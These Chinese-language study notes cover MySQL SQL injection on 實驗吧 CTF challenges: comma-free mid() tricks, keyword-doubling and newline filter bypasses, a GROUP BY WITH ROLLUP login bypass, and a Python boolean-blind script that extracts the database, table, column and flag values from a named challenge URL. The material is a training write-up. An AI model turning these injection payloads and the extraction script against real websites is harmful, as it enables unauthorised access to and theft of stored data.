學習筆記 UpdateXml() MYSQL顯錯注入
實驗吧 加了料的報錯注入 https://blog.csdn.net/xingyyn78/article/details/79737070
認真一點報錯注入
mid((database())from(1)for(1))
mid((database())from(2)for(1))
mid((database())from(3)for(1))
如果要用到mid函數,但是逗號被屏蔽了,就用這種形式
實驗吧 因缺思汀的繞過
表結構如下:
select * from
from `users`
where `user`=-1 || 1
group by `password` with rollup
用了這個語句後結果爲
在password字段聚合了一個null
select *
from `users`
where `user`=-1 || 1
group by `password` with rollup
limit 1 offset 5
調過前五條,拿出一個null(改一下select * 就行了)
配合其他write食用更佳
https://blog.csdn.net/wy_97/article/details/76085575
https://blog.csdn.net/yplee_8/article/details/52252549
實驗吧認真的
import requests
char_set = r'~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
char_len = len(char_set)
url = r'http://ctf5.shiyanbar.com/web/earnest/index.php'
session = requests.session()
true_state = 'You are in'
next_line_flag = 0
def my_print(char_word, next_line=False):
global next_line_flag
if next_line:
print()
print('OK, got!', char_word)
next_line_flag = 0
else:
if next_line_flag >= 70:
print()
next_line_flag = 0
else:
print(char_word, end='', flush=True)
next_line_flag += 1
# 爆破數據庫的長度
# database_len = 0
# for x in range(50):
# payload = "0'oorr((length(database()))=%s)oorr'0" % (x)
# post_data = {'id': payload}
# my_print(x)
# res = session.post(url, data=post_data)
# if true_state in res.text:
# my_print(x, True)
# database_len = x
# break
database_len = 18 # 去掉
db_name = ''
# 爆破數據庫名
# for x in range(database_len):
# for y in char_set:
# payload = "0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" % (x+1, y)
# post_data = {'id': payload}
# my_print(y)
# res = session.post(url, post_data)
# if true_state in res.text:
# db_name += y
# my_print(db_name, True)
# break
# 爆破錶名
# table_name = ''
# try:
# for x in range(50):
# for y in char_set:
# payload = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='%s')oorr'0" % (x+1, y)
# payload = payload.replace(' ', chr(0x0a))
# post_data = {'id': payload}
# my_print(y)
# res = session.post(url, data=post_data)
# if true_state in res.text:
# table_name += y
# my_print(table_name, True)
# break
# except KeyboardInterrupt:
# print('\n停止爆破錶名,繼續下一步')
table_name = 'fiag'
# 爆破列名 不知道咋回事,列名好像壞了,爆不出來 fl$4g@id@username@password
column_name = ''
# try:
# for x in range(50):
# for y in char_set:
# payload = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (x+1, y)
# payload = payload.replace(' ', chr(0x0a))
# post_data = {'id': payload}
# my_print(y)
# res = session.post(url, data=post_data)
# if true_state in res.text:
# column_name += y
# my_print(column_name, True)
# break
# except KeyboardInterrupt:
# print('\n停止爆破錶名,繼續下一步')
column_name = r'fl$4g@id@username@password'
# 爆破
column_name = r'fl$4g'
flag_dump = ''
try:
for x in range(50):
for y in char_set:
payload = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (x+1, y)
payload = payload.replace(' ', chr(0x0a))
post_data = {'id': payload}
my_print(y)
res = session.post(url, data=post_data)
if true_state in res.text:
flag_dump += y
my_print(flag_dump, True)
break
except KeyboardInterrupt:
print('\n停止爆破錶名,繼續下一步')